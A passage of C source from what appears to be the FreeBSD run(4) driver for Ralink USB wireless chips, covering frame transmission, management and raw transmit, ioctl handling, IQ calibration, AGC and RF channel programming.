uint16_t dur; uint16_t qid; uint8_t type; uint8_t tid; uint8_t ridx; uint8_t ctl_ridx; uint8_t qflags; uint8_t xflags = 0; int hasqos; RUN_LOCK_ASSERT(sc, MA_OWNED); wh = mtod(m, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; /* * There are 7 bulk endpoints: 1 for RX * and 6 for TX (4 EDCAs + HCCA + Prio). * Update 03-14-2009: some devices like the Planex GW-US300MiniS * seem to have only 4 TX bulk endpoints (Fukaumi Naoki). */ if ((hasqos = IEEE80211_QOS_HAS_SEQ(wh))) { uint8_t *frm; if(IEEE80211_HAS_ADDR4(wh)) frm = ((struct ieee80211_qosframe_addr4 *)wh)->i_qos; else frm =((struct ieee80211_qosframe *)wh)->i_qos; qos = le16toh(*(const uint16_t *)frm); tid = qos & IEEE80211_QOS_TID; qid = TID_TO_WME_AC(tid); } else { qos = 0; tid = 0; qid = WME_AC_BE; } qflags = (qid < 4) ? RT2860_TX_QSEL_EDCA : RT2860_TX_QSEL_HCCA; DPRINTFN(8, "qos %d\tqid %d\ttid %d\tqflags %x\n", qos, qid, tid, qflags); chan = (ni->ni_chan != IEEE80211_CHAN_ANYC)?ni->ni_chan:ic->ic_curchan; tp = &vap->iv_txparms[ieee80211_chan2mode(chan)]; /* pickup a rate index */ if (IEEE80211_IS_MULTICAST(wh->i_addr1) || type != IEEE80211_FC0_TYPE_DATA) { ridx = (ic->ic_curmode == IEEE80211_MODE_11A) ? RT2860_RIDX_OFDM6 : RT2860_RIDX_CCK1; ctl_ridx = rt2860_rates[ridx].ctl_ridx; } else { if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) ridx = rn->fix_ridx; else ridx = rn->amrr_ridx; ctl_ridx = rt2860_rates[ridx].ctl_ridx; } if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && (!hasqos || (qos & IEEE80211_QOS_ACKPOLICY) != IEEE80211_QOS_ACKPOLICY_NOACK)) { xflags |= RT2860_TX_ACK; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) dur = rt2860_rates[ctl_ridx].sp_ack_dur; else dur = rt2860_rates[ctl_ridx].lp_ack_dur; USETW(wh->i_dur, dur); } /* reserve slots for mgmt packets, just in case */ if (sc->sc_epq[qid].tx_nfree < 3) { DPRINTFN(10, "tx ring %d is full\n", qid); return (-1); } data = STAILQ_FIRST(&sc->sc_epq[qid].tx_fh); STAILQ_REMOVE_HEAD(&sc->sc_epq[qid].tx_fh, next); sc->sc_epq[qid].tx_nfree--; txd = (struct rt2870_txd *)&data->desc; txd->flags = qflags; txwi = (struct rt2860_txwi *)(txd + 1); txwi->xflags = xflags; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) txwi->wcid = 0; else txwi->wcid = (vap->iv_opmode == IEEE80211_M_STA) ? 1 : RUN_AID2WCID(ni->ni_associd); /* clear leftover garbage bits */ txwi->flags = 0; txwi->txop = 0; data->m = m; data->ni = ni; data->ridx = ridx; run_set_tx_desc(sc, data); /* * The chip keeps track of 2 kind of Tx stats, * * TX_STAT_FIFO, for per WCID stats, and * * TX_STA_CNT0 for all-TX-in-one stats. * * To use FIFO stats, we need to store MCS into the driver-private * PacketID field. So that, we can tell whose stats when we read them. * We add 1 to the MCS because setting the PacketID field to 0 means * that we don't want feedback in TX_STAT_FIFO. * And, that's what we want for STA mode, since TX_STA_CNT0 does the job. * * FIFO stats doesn't count Tx with WCID 0xff, so we do this in run_tx(). */ if (sc->rvp_cnt > 1 || vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS) { uint16_t pid = (rt2860_rates[ridx].mcs + 1) & 0xf; txwi->len |= htole16(pid << RT2860_TX_PID_SHIFT); /* * Unlike PCI based devices, we don't get any interrupt from * USB devices, so we simulate FIFO-is-full interrupt here. * Ralink recomends to drain FIFO stats every 100 ms, but 16 slots * quickly get fulled. To prevent overflow, increment a counter on * every FIFO stat request, so we know how many slots are left. * We do this only in HOSTAP or multiple vap mode since FIFO stats * are used only in those modes. * We just drain stats. AMRR gets updated every 1 sec by * run_ratectl_cb() via callout. * Call it early. Otherwise overflow. */ if (sc->fifo_cnt++ == 10) { /* * With multiple vaps or if_bridge, if_start() is called * with a non-sleepable lock, tcpinp. So, need to defer. */ uint32_t i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTFN(6, "cmdq_store=%d\n", i); sc->cmdq[i].func = run_drain_fifo; sc->cmdq[i].arg0 = sc; ieee80211_runtask(ic, &sc->cmdq_task); } } STAILQ_INSERT_TAIL(&sc->sc_epq[qid].tx_qh, data, next); usbd_transfer_start(sc->sc_xfer[qid]); DPRINTFN(8, "sending data frame len=%d rate=%d qid=%d\n", m->m_pkthdr.len + (int)(sizeof(struct rt2870_txd) + sizeof(struct rt2860_txwi)), rt2860_rates[ridx].rate, qid); return (0); } static int run_tx_mgt(struct run_softc *sc, struct mbuf *m, struct ieee80211_node *ni) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct run_node *rn = (void *)ni; struct run_tx_data *data; struct ieee80211_frame *wh; struct rt2870_txd *txd; struct rt2860_txwi *txwi; uint16_t dur; uint8_t ridx = rn->mgt_ridx; uint8_t type; uint8_t xflags = 0; uint8_t wflags = 0; RUN_LOCK_ASSERT(sc, MA_OWNED); wh = mtod(m, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; /* tell hardware to add timestamp for probe responses */ if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP)) wflags |= RT2860_TX_TS; else if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { xflags |= RT2860_TX_ACK; dur = ieee80211_ack_duration(ic->ic_rt, rt2860_rates[ridx].rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); USETW(wh->i_dur, dur); } if (sc->sc_epq[0].tx_nfree == 0) { /* let caller free mbuf */ ifp->if_drv_flags |= IFF_DRV_OACTIVE; return (EIO); } data = STAILQ_FIRST(&sc->sc_epq[0].tx_fh); STAILQ_REMOVE_HEAD(&sc->sc_epq[0].tx_fh, next); sc->sc_epq[0].tx_nfree--; txd = (struct rt2870_txd *)&data->desc; txd->flags = RT2860_TX_QSEL_EDCA; txwi = (struct rt2860_txwi *)(txd + 1); txwi->wcid = 0xff; txwi->flags = wflags; txwi->xflags = xflags; txwi->txop = 0; /* clear leftover garbage bits */ data->m = m; data->ni = ni; data->ridx = ridx; run_set_tx_desc(sc, data); DPRINTFN(10, "sending mgt frame len=%d rate=%d\n", m->m_pkthdr.len + (int)(sizeof(struct rt2870_txd) + sizeof(struct rt2860_txwi)), rt2860_rates[ridx].rate); STAILQ_INSERT_TAIL(&sc->sc_epq[0].tx_qh, data, next); usbd_transfer_start(sc->sc_xfer[0]); return (0); } static int run_sendprot(struct run_softc *sc, const struct mbuf *m, struct ieee80211_node *ni, int prot, int rate) { struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; struct run_tx_data *data; struct rt2870_txd *txd; struct rt2860_txwi *txwi; struct mbuf *mprot; int ridx; int protrate; int ackrate; int pktlen; int isshort; uint16_t dur; uint8_t type; uint8_t wflags = 0; uint8_t xflags = 0; RUN_LOCK_ASSERT(sc, MA_OWNED); KASSERT(prot == IEEE80211_PROT_RTSCTS || prot == IEEE80211_PROT_CTSONLY, ("protection %d", prot)); wh = mtod(m, struct ieee80211_frame *); pktlen = m->m_pkthdr.len + IEEE80211_CRC_LEN; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; protrate = ieee80211_ctl_rate(ic->ic_rt, rate); ackrate = ieee80211_ack_rate(ic->ic_rt, rate); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; dur = ieee80211_compute_duration(ic->ic_rt, pktlen, rate, isshort) + ieee80211_ack_duration(ic->ic_rt, rate, isshort); wflags = RT2860_TX_FRAG; /* check that there are free slots before allocating the mbuf */ if (sc->sc_epq[0].tx_nfree == 0) { /* let caller free mbuf */ sc->sc_ifp->if_drv_flags |= IFF_DRV_OACTIVE; return (ENOBUFS); } if (prot == IEEE80211_PROT_RTSCTS) { /* NB: CTS is the same size as an ACK */ dur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); xflags |= RT2860_TX_ACK; mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, dur); } else { mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, dur); } if (mprot == NULL) { sc->sc_ifp->if_oerrors++; DPRINTF("could not allocate mbuf\n"); return (ENOBUFS); } data = STAILQ_FIRST(&sc->sc_epq[0].tx_fh); STAILQ_REMOVE_HEAD(&sc->sc_epq[0].tx_fh, next); sc->sc_epq[0].tx_nfree--; txd = (struct rt2870_txd *)&data->desc; txd->flags = RT2860_TX_QSEL_EDCA; txwi = (struct rt2860_txwi *)(txd + 1); txwi->wcid = 0xff; txwi->flags = wflags; txwi->xflags = xflags; txwi->txop = 0; /* clear leftover garbage bits */ data->m = mprot; data->ni = ieee80211_ref_node(ni); for (ridx = 0; ridx < RT2860_RIDX_MAX; ridx++) if (rt2860_rates[ridx].rate == protrate) break; data->ridx = ridx; run_set_tx_desc(sc, data); DPRINTFN(1, "sending prot len=%u rate=%u\n", m->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->sc_epq[0].tx_qh, data, next); usbd_transfer_start(sc->sc_xfer[0]); return (0); } static int run_tx_param(struct run_softc *sc, struct mbuf *m, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; struct run_tx_data *data; struct rt2870_txd *txd; struct rt2860_txwi *txwi; uint8_t type; uint8_t ridx; uint8_t rate; uint8_t opflags = 0; uint8_t xflags = 0; int error; RUN_LOCK_ASSERT(sc, MA_OWNED); KASSERT(params != NULL, ("no raw xmit params")); wh = mtod(m, struct ieee80211_frame *); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; rate = params->ibp_rate0; if (!ieee80211_isratevalid(ic->ic_rt, rate)) { /* let caller free mbuf */ return (EINVAL); } if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) xflags |= RT2860_TX_ACK; if (params->ibp_flags & (IEEE80211_BPF_RTS|IEEE80211_BPF_CTS)) { error = run_sendprot(sc, m, ni, params->ibp_flags & IEEE80211_BPF_RTS ? IEEE80211_PROT_RTSCTS : IEEE80211_PROT_CTSONLY, rate); if (error) { /* let caller free mbuf */ return error; } opflags |= /*XXX RT2573_TX_LONG_RETRY |*/ RT2860_TX_TXOP_SIFS; } if (sc->sc_epq[0].tx_nfree == 0) { /* let caller free mbuf */ sc->sc_ifp->if_drv_flags |= IFF_DRV_OACTIVE; DPRINTF("sending raw frame, but tx ring is full\n"); return (EIO); } data = STAILQ_FIRST(&sc->sc_epq[0].tx_fh); STAILQ_REMOVE_HEAD(&sc->sc_epq[0].tx_fh, next); sc->sc_epq[0].tx_nfree--; txd = (struct rt2870_txd *)&data->desc; txd->flags = RT2860_TX_QSEL_EDCA; txwi = (struct rt2860_txwi *)(txd + 1); txwi->wcid = 0xff; txwi->xflags = xflags; txwi->txop = opflags; txwi->flags = 0; /* clear leftover garbage bits */ data->m = m; data->ni = ni; for (ridx = 0; ridx < RT2860_RIDX_MAX; ridx++) if (rt2860_rates[ridx].rate == rate) break; data->ridx = ridx; run_set_tx_desc(sc, data); DPRINTFN(10, "sending raw frame len=%u rate=%u\n", m->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->sc_epq[0].tx_qh, data, next); usbd_transfer_start(sc->sc_xfer[0]); return (0); } static int run_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = ni->ni_ic->ic_ifp; struct run_softc *sc = ifp->if_softc; int error = 0; RUN_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { error = ENETDOWN; goto done; } if (params == NULL) { /* tx mgt packet */ if ((error = run_tx_mgt(sc, m, ni)) != 0) { ifp->if_oerrors++; DPRINTF("mgt tx failed\n"); goto done; } } else { /* tx raw packet with param */ if ((error = run_tx_param(sc, m, ni, params)) != 0) { ifp->if_oerrors++; DPRINTF("tx with param failed\n"); goto done; } } ifp->if_opackets++; done: RUN_UNLOCK(sc); if (error != 0) { if(m != NULL) m_freem(m); ieee80211_free_node(ni); } return (error); } static void run_start(struct ifnet *ifp) { struct run_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; RUN_LOCK(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { RUN_UNLOCK(sc); return; } for (;;) { /* send data frames */ IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; if (run_tx(sc, m, ni) != 0) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } } RUN_UNLOCK(sc); } static int run_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct run_softc *sc = ifp->if_softc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int startall = 0; int error; RUN_LOCK(sc); error = sc->sc_detached ? ENXIO : 0; RUN_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: RUN_LOCK(sc); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)){ startall = 1; run_init_locked(sc); } else run_update_promisc_locked(ifp); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING && (ic->ic_nrunning == 0 || sc->rvp_cnt <= 1)) { run_stop(sc); } } RUN_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static void run_iq_calib(struct run_softc *sc, u_int chan) { uint16_t val; /* Tx0 IQ gain. */ run_bbp_write(sc, 158, 0x2c); if (chan <= 14) run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX0_2GHZ, &val, 1); else if (chan <= 64) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX0_CH36_TO_CH64_5GHZ, &val, 1); } else if (chan <= 138) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX0_CH100_TO_CH138_5GHZ, &val, 1); } else if (chan <= 165) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX0_CH140_TO_CH165_5GHZ, &val, 1); } else val = 0; run_bbp_write(sc, 159, val); /* Tx0 IQ phase. */ run_bbp_write(sc, 158, 0x2d); if (chan <= 14) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX0_2GHZ, &val, 1); } else if (chan <= 64) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX0_CH36_TO_CH64_5GHZ, &val, 1); } else if (chan <= 138) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX0_CH100_TO_CH138_5GHZ, &val, 1); } else if (chan <= 165) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX0_CH140_TO_CH165_5GHZ, &val, 1); } else val = 0; run_bbp_write(sc, 159, val); /* Tx1 IQ gain. */ run_bbp_write(sc, 158, 0x4a); if (chan <= 14) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX1_2GHZ, &val, 1); } else if (chan <= 64) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX1_CH36_TO_CH64_5GHZ, &val, 1); } else if (chan <= 138) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX1_CH100_TO_CH138_5GHZ, &val, 1); } else if (chan <= 165) { run_efuse_read(sc, RT5390_EEPROM_IQ_GAIN_CAL_TX1_CH140_TO_CH165_5GHZ, &val, 1); } else val = 0; run_bbp_write(sc, 159, val); /* Tx1 IQ phase. */ run_bbp_write(sc, 158, 0x4b); if (chan <= 14) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX1_2GHZ, &val, 1); } else if (chan <= 64) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX1_CH36_TO_CH64_5GHZ, &val, 1); } else if (chan <= 138) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX1_CH100_TO_CH138_5GHZ, &val, 1); } else if (chan <= 165) { run_efuse_read(sc, RT5390_EEPROM_IQ_PHASE_CAL_TX1_CH140_TO_CH165_5GHZ, &val, 1); } else val = 0; run_bbp_write(sc, 159, val); /* RF IQ compensation control. */ run_bbp_write(sc, 158, 0x04); run_efuse_read(sc, RT5390_EEPROM_RF_IQ_COMPENSATION_CTL, &val, 1); run_bbp_write(sc, 159, val); /* RF IQ imbalance compensation control. */ run_bbp_write(sc, 158, 0x03); run_efuse_read(sc, RT5390_EEPROM_RF_IQ_IMBALANCE_COMPENSATION_CTL, &val, 1); run_bbp_write(sc, 159, val); } static void run_set_agc(struct run_softc *sc, uint8_t agc) { uint8_t bbp; if (sc->mac_ver == 0x3572) { run_bbp_read(sc, 27, &bbp); bbp &= ~(0x3 << 5); run_bbp_write(sc, 27, bbp | 0 << 5); /* select Rx0 */ run_bbp_write(sc, 66, agc); run_bbp_write(sc, 27, bbp | 1 << 5); /* select Rx1 */ run_bbp_write(sc, 66, agc); } else run_bbp_write(sc, 66, agc); } static void run_select_chan_group(struct run_softc *sc, int group) { uint32_t tmp; uint8_t agc; run_bbp_write(sc, 62, 0x37 - sc->lna[group]); run_bbp_write(sc, 63, 0x37 - sc->lna[group]); run_bbp_write(sc, 64, 0x37 - sc->lna[group]); if (sc->mac_ver < 0x3572) run_bbp_write(sc, 86, 0x00); if (sc->mac_ver == 0x3593) { run_bbp_write(sc, 77, 0x98); run_bbp_write(sc, 83, (group == 0) ? 0x8a : 0x9a); } if (group == 0) { if (sc->ext_2ghz_lna) { if (sc->mac_ver >= 0x5390) run_bbp_write(sc, 75, 0x52); else { run_bbp_write(sc, 82, 0x62); run_bbp_write(sc, 75, 0x46); } } else { if (sc->mac_ver == 0x5592) { run_bbp_write(sc, 79, 0x1c); run_bbp_write(sc, 80, 0x0e); run_bbp_write(sc, 81, 0x3a); run_bbp_write(sc, 82, 0x62); run_bbp_write(sc, 195, 0x80); run_bbp_write(sc, 196, 0xe0); run_bbp_write(sc, 195, 0x81); run_bbp_write(sc, 196, 0x1f); run_bbp_write(sc, 195, 0x82); run_bbp_write(sc, 196, 0x38); run_bbp_write(sc, 195, 0x83); run_bbp_write(sc, 196, 0x32); run_bbp_write(sc, 195, 0x85); run_bbp_write(sc, 196, 0x28); run_bbp_write(sc, 195, 0x86); run_bbp_write(sc, 196, 0x19); } else if (sc->mac_ver >= 0x5390) run_bbp_write(sc, 75, 0x50); else { run_bbp_write(sc, 82, (sc->mac_ver == 0x3593) ? 0x62 : 0x84); run_bbp_write(sc, 75, 0x50); } } } else { if (sc->mac_ver == 0x5592) { run_bbp_write(sc, 79, 0x18); run_bbp_write(sc, 80, 0x08); run_bbp_write(sc, 81, 0x38); run_bbp_write(sc, 82, 0x92); run_bbp_write(sc, 195, 0x80); run_bbp_write(sc, 196, 0xf0); run_bbp_write(sc, 195, 0x81); run_bbp_write(sc, 196, 0x1e); run_bbp_write(sc, 195, 0x82); run_bbp_write(sc, 196, 0x28); run_bbp_write(sc, 195, 0x83); run_bbp_write(sc, 196, 0x20); run_bbp_write(sc, 195, 0x85); run_bbp_write(sc, 196, 0x7f); run_bbp_write(sc, 195, 0x86); run_bbp_write(sc, 196, 0x7f); } else if (sc->mac_ver == 0x3572) run_bbp_write(sc, 82, 0x94); else run_bbp_write(sc, 82, (sc->mac_ver == 0x3593) ? 0x82 : 0xf2); if (sc->ext_5ghz_lna) run_bbp_write(sc, 75, 0x46); else run_bbp_write(sc, 75, 0x50); } run_read(sc, RT2860_TX_BAND_CFG, &tmp); tmp &= ~(RT2860_5G_BAND_SEL_N | RT2860_5G_BAND_SEL_P); tmp |= (group == 0) ? RT2860_5G_BAND_SEL_N : RT2860_5G_BAND_SEL_P; run_write(sc, RT2860_TX_BAND_CFG, tmp); /* enable appropriate Power Amplifiers and Low Noise Amplifiers */ tmp = RT2860_RFTR_EN | RT2860_TRSW_EN | RT2860_LNA_PE0_EN; if (sc->mac_ver == 0x3593) tmp |= 1 << 29 | 1 << 28; if (sc->nrxchains > 1) tmp |= RT2860_LNA_PE1_EN; if (group == 0) { /* 2GHz */ tmp |= RT2860_PA_PE_G0_EN; if (sc->ntxchains > 1) tmp |= RT2860_PA_PE_G1_EN; if (sc->mac_ver == 0x3593) { if (sc->ntxchains > 2) tmp |= 1 << 25; } } else { /* 5GHz */ tmp |= RT2860_PA_PE_A0_EN; if (sc->ntxchains > 1) tmp |= RT2860_PA_PE_A1_EN; } if (sc->mac_ver == 0x3572) { run_rt3070_rf_write(sc, 8, 0x00); run_write(sc, RT2860_TX_PIN_CFG, tmp); run_rt3070_rf_write(sc, 8, 0x80); } else run_write(sc, RT2860_TX_PIN_CFG, tmp); if (sc->mac_ver == 0x5592) { run_bbp_write(sc, 195, 0x8d); run_bbp_write(sc, 196, 0x1a); } if (sc->mac_ver == 0x3593) { run_read(sc, RT2860_GPIO_CTRL, &tmp); tmp &= ~0x01010000; if (group == 0) tmp |= 0x00010000; tmp = (tmp & ~0x00009090) | 0x00000090; run_write(sc, RT2860_GPIO_CTRL, tmp); } /* set initial AGC value */ if (group == 0) { /* 2GHz band */ if (sc->mac_ver >= 0x3070) agc = 0x1c + sc->lna[0] * 2; else agc = 0x2e + sc->lna[0]; } else { /* 5GHz band */ if (sc->mac_ver == 0x5592) agc = 0x24 + sc->lna[group] * 2; else if (sc->mac_ver == 0x3572 || sc->mac_ver == 0x3593) agc = 0x22 + (sc->lna[group] * 5) / 3; else agc = 0x32 + (sc->lna[group] * 5) / 3; } run_set_agc(sc, agc); } static void run_rt2870_set_chan(struct run_softc *sc, u_int chan) { const struct rfprog *rfprog = rt2860_rf2850; uint32_t r2, r3, r4; int8_t txpow1, txpow2; int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rfprog[i].chan != chan; i++); r2 = rfprog[i].r2; if (sc->ntxchains == 1) r2 |= 1 << 14; /* 1T: disable Tx chain 2 */ if (sc->nrxchains == 1) r2 |= 1 << 17 | 1 << 6; /* 1R: disable Rx chains 2 & 3 */ else if (sc->nrxchains == 2) r2 |= 1 << 6; /* 2R: disable Rx chain 3 */ /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; /* Initialize RF R3 and R4. */ r3 = rfprog[i].r3 & 0xffffc1ff; r4 = (rfprog[i].r4 & ~(0x001f87c0)) | (sc->freq << 15); if (chan > 14) { if (txpow1 >= 0) { txpow1 = (txpow1 > 0xf) ? (0xf) : (txpow1); r3 |= (txpow1 << 10) | (1 << 9); } else { txpow1 += 7; /* txpow1 is not possible larger than 15. */ r3 |= (txpow1 << 10); } if (txpow2 >= 0) { txpow2 = (txpow2 > 0xf) ? (0xf) : (txpow2); r4 |= (txpow2 << 7) | (1 << 6); } else { txpow2 += 7; r4 |= (txpow2 << 7); } } else { /* Set Tx0 power. */ r3 |= (txpow1 << 9); /* Set frequency offset and Tx1 power. */ r4 |= (txpow2 << 6); } run_rt2870_rf_write(sc, rfprog[i].r1); run_rt2870_rf_write(sc, r2); run_rt2870_rf_write(sc, r3 & ~(1 << 2)); run_rt2870_rf_write(sc, r4); run_delay(sc, 10); run_rt2870_rf_write(sc, rfprog[i].r1); run_rt2870_rf_write(sc, r2); run_rt2870_rf_write(sc, r3 | (1 << 2)); run_rt2870_rf_write(sc, r4); run_delay(sc, 10); run_rt2870_rf_write(sc, rfprog[i].r1); run_rt2870_rf_write(sc, r2); run_rt2870_rf_write(sc, r3 & ~(1 << 2)); run_rt2870_rf_write(sc, r4); } static void run_rt3070_set_chan(struct run_softc *sc, u_int chan) { int8_t txpow1, txpow2; uint8_t rf; int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; run_rt3070_rf_write(sc, 2, rt3070_freqs[i].n); /* RT3370/RT3390: RF R3 [7:4] is not reserved bits. */ run_rt3070_rf_read(sc, 3, &rf); rf = (rf & ~0x0f) | rt3070_freqs[i].k; run_rt3070_rf_write(sc, 3, rf); run_rt3070_rf_read(sc, 6, &rf); rf = (rf & ~0x03) | rt3070_freqs[i].r; run_rt3070_rf_write(sc, 6, rf); /* set Tx0 power */ run_rt3070_rf_read(sc, 12, &rf); rf = (rf & ~0x1f) | txpow1; run_rt3070_rf_write(sc, 12, rf); /* set Tx1 power */ run_rt3070_rf_read(sc, 13, &rf); rf = (rf & ~0x1f) | txpow2; run_rt3070_rf_write(sc, 13, rf); run_rt3070_rf_read(sc, 1, &rf); rf &= ~0xfc; if (sc->ntxchains == 1) rf |= 1 << 7 | 1 << 5; /* 1T: disable Tx chains 2 & 3 */ else if (sc->ntxchains == 2) rf |= 1 << 7; /* 2T: disable Tx chain 3 */ if (sc->nrxchains == 1) rf |= 1 << 6 | 1 << 4; /* 1R: disable Rx chains 2 & 3 */ else if (sc->nrxchains == 2) rf |= 1 << 6; /* 2R: disable Rx chain 3 */ run_rt3070_rf_write(sc, 1, rf); /* set RF offset */ run_rt3070_rf_read(sc, 23, &rf); rf = (rf & ~0x7f) | sc->freq; run_rt3070_rf_write(sc, 23, rf); /* program RF filter */ run_rt3070_rf_read(sc, 24, &rf); /* Tx */ rf = (rf & ~0x3f) | sc->rf24_20mhz; run_rt3070_rf_write(sc, 24, rf); run_rt3070_rf_read(sc, 31, &rf); /* Rx */ rf = (rf & ~0x3f) | sc->rf24_20mhz; run_rt3070_rf_write(sc, 31, rf); /* enable RF tuning */ run_rt3070_rf_read(sc, 7, &rf); run_rt3070_rf_write(sc, 7, rf | 0x01); } static void run_rt3572_set_chan(struct run_softc *sc, u_int chan) { int8_t txpow1, txpow2; uint32_t tmp; uint8_t rf; int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; if (chan <= 14) { run_bbp_write(sc, 25, sc->bbp25); run_bbp_write(sc, 26, sc->bbp26); } else { /* enable IQ phase correction */ run_bbp_write(sc, 25, 0x09); run_bbp_write(sc, 26, 0xff); } run_rt3070_rf_write(sc, 2, rt3070_freqs[i].n); run_rt3070_rf_write(sc, 3, rt3070_freqs[i].k); run_rt3070_rf_read(sc, 6, &rf); rf = (rf & ~0x0f) | rt3070_freqs[i].r; rf |= (chan <= 14) ? 0x08 : 0x04; run_rt3070_rf_write(sc, 6, rf); /* set PLL mode */ run_rt3070_rf_read(sc, 5, &rf); rf &= ~(0x08 | 0x04); rf |= (chan <= 14) ? 0x04 : 0x08; run_rt3070_rf_write(sc, 5, rf); /* set Tx power for chain 0 */ if (chan <= 14) rf = 0x60 | txpow1; else rf = 0xe0 | (txpow1 & 0xc) << 1 | (txpow1 & 0x3); run_rt3070_rf_write(sc, 12, rf); /* set Tx power for chain 1 */ if (chan <= 14) rf = 0x60 | txpow2; else rf = 0xe0 | (txpow2 & 0xc) << 1 | (txpow2 & 0x3); run_rt3070_rf_write(sc, 13, rf); /* set Tx/Rx streams */ run_rt3070_rf_read(sc, 1, &rf); rf &= ~0xfc; if (sc->ntxchains == 1) rf |= 1 << 7 | 1 << 5; /* 1T: disable Tx chains 2 & 3 */ else if (sc->ntxchains == 2) rf |= 1 << 7; /* 2T: disable Tx chain 3 */ if (sc->nrxchains == 1) rf |= 1 << 6 | 1 << 4; /* 1R: disable Rx chains 2 & 3 */ else if (sc->nrxchains == 2) rf |= 1 << 6; /* 2R: disable Rx chain 3 */ run_rt3070_rf_write(sc, 1, rf); /* set RF offset */ run_rt3070_rf_read(sc, 23, &rf); rf = (rf & ~0x7f) | sc->freq; run_rt3070_rf_write(sc, 23, rf); /* program RF filter */ rf = sc->rf24_20mhz; run_rt3070_rf_write(sc, 24, rf); /* Tx */ run_rt3070_rf_write(sc, 31, rf); /* Rx */ /* enable RF tuning */ run_rt3070_rf_read(sc, 7, &rf); rf = (chan <= 14) ? 0xd8 : ((rf & ~0xc8) | 0x14); run_rt3070_rf_write(sc, 7, rf); /* TSSI */ rf = (chan <= 14) ? 0xc3 : 0xc0; run_rt3070_rf_write(sc, 9, rf); /* set loop filter 1 */ run_rt3070_rf_write(sc, 10, 0xf1); /* set loop filter 2 */ run_rt3070_rf_write(sc, 11, (chan <= 14) ? 0xb9 : 0x00); /* set tx_mx2_ic */ run_rt3070_rf_write(sc, 15, (chan <= 14) ? 0x53 : 0x43); /* set tx_mx1_ic */ if (chan <= 14) rf = 0x48 | sc->txmixgain_2ghz; else rf = 0x78 | sc->txmixgain_5ghz; run_rt3070_rf_write(sc, 16, rf); /* set tx_lo1 */ run_rt3070_rf_write(sc, 17, 0x23); /* set tx_lo2 */ if (chan <= 14) rf = 0x93; else if (chan <= 64) rf = 0xb7; else if (chan <= 128) rf = 0x74; else rf = 0x72; run_rt3070_rf_write(sc, 19, rf); /* set rx_lo1 */ if (chan <= 14) rf = 0xb3; else if (chan <= 64) rf = 0xf6; else 